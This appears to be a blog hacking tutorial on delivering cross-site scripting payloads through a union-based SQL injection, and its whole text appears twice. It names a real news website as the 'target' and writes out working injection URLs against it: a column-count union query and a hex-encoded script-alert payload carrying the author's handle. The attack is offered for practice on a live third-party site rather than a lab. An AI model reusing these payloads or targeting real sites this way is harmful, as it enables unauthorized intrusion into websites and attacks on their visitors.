Tn this Tutorial you will learn XSS Attack via SQL Injection.
If you are knew to XSS then i Suggest You To First Read out the Basics from the Previous Tutorial to know How it Works and What a attacker can do with XSS vulnerability.Once you have the Basic knowledge About XSS Attack then you will be able to better Understand this Tutorial "XSS with SQL Injection".
In XSS Attack via SQL Injection we will Execute our XSS payloads in UNION BASEDquery.
For Example:
We have Found a website Which is vulnerable to SQL Injection and inject into the database.But there we can also Execute our XSS Payloads in our Union Based Query.lets Take a site for Practice,
Here is The TARGET Site
http://www.lokmat.com/storypage.php?catid=31&newsid=3448
After Counting the Columns there are 9 Total Number of Columns.So let's ready up our Union Based Query and execute it .
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,3,4,5,6,7,8,9--+
There we got 3rd Column is printed on the page as output , So we will execute our XSS Payload in that column
Here is the our XSS Payload that we are going to inject into the UNION BASED Query,
XSS PAYLOAD : <script>alert('Injected BY Mr.cyb3rwarrior-Adeshkolte');</script>
Before executing this Payload we need to Encode it in HEX Value (use hackbar)
HexValue:0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e
Let's Insert this payload in our Union Based Query and Execute the query,
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e,4,5,6,7,8,9--+
output
This Payload will Display us a XSS Pop-up Alert .This is the basic XSS Payload
Enjoy
This is the basic XSS Payload ,you can try more Payloads which will posted in the next tutoria
If you are knew to XSS then i Suggest You To First Read out the Basics from the Previous Tutorial to know How it Works and What a attacker can do with XSS vulnerability.Once you have the Basic knowledge About XSS Attack then you will be able to better Understand this Tutorial "XSS with SQL Injection".
In XSS Attack via SQL Injection we will Execute our XSS payloads in UNION BASEDquery.
For Example:
We have Found a website Which is vulnerable to SQL Injection and inject into the database.But there we can also Execute our XSS Payloads in our Union Based Query.lets Take a site for Practice,
Here is The TARGET Site
http://www.lokmat.com/storypage.php?catid=31&newsid=3448
After Counting the Columns there are 9 Total Number of Columns.So let's ready up our Union Based Query and execute it .
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,3,4,5,6,7,8,9--+
There we got 3rd Column is printed on the page as output , So we will execute our XSS Payload in that column
Here is the our XSS Payload that we are going to inject into the UNION BASED Query,
XSS PAYLOAD : <script>alert('Injected BY Mr.cyb3rwarrior-Adeshkolte');</script>
Before executing this Payload we need to Encode it in HEX Value (use hackbar)
HexValue:0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e
Let's Insert this payload in our Union Based Query and Execute the query,
http://www.lokmat.com/storypage.php?catid=31&newsid=3448'union select 1,2,0x3c7363726970743e616c6572742827496e6a6563746564204259204d722e637962337277617272696f722d41646573686b6f6c746527293b3c2f7363726970743e,4,5,6,7,8,9--+
output
This Payload will Display us a XSS Pop-up Alert .This is the basic XSS Payload
Enjoy
This is the basic XSS Payload ,you can try more Payloads which will posted in the next tutoria
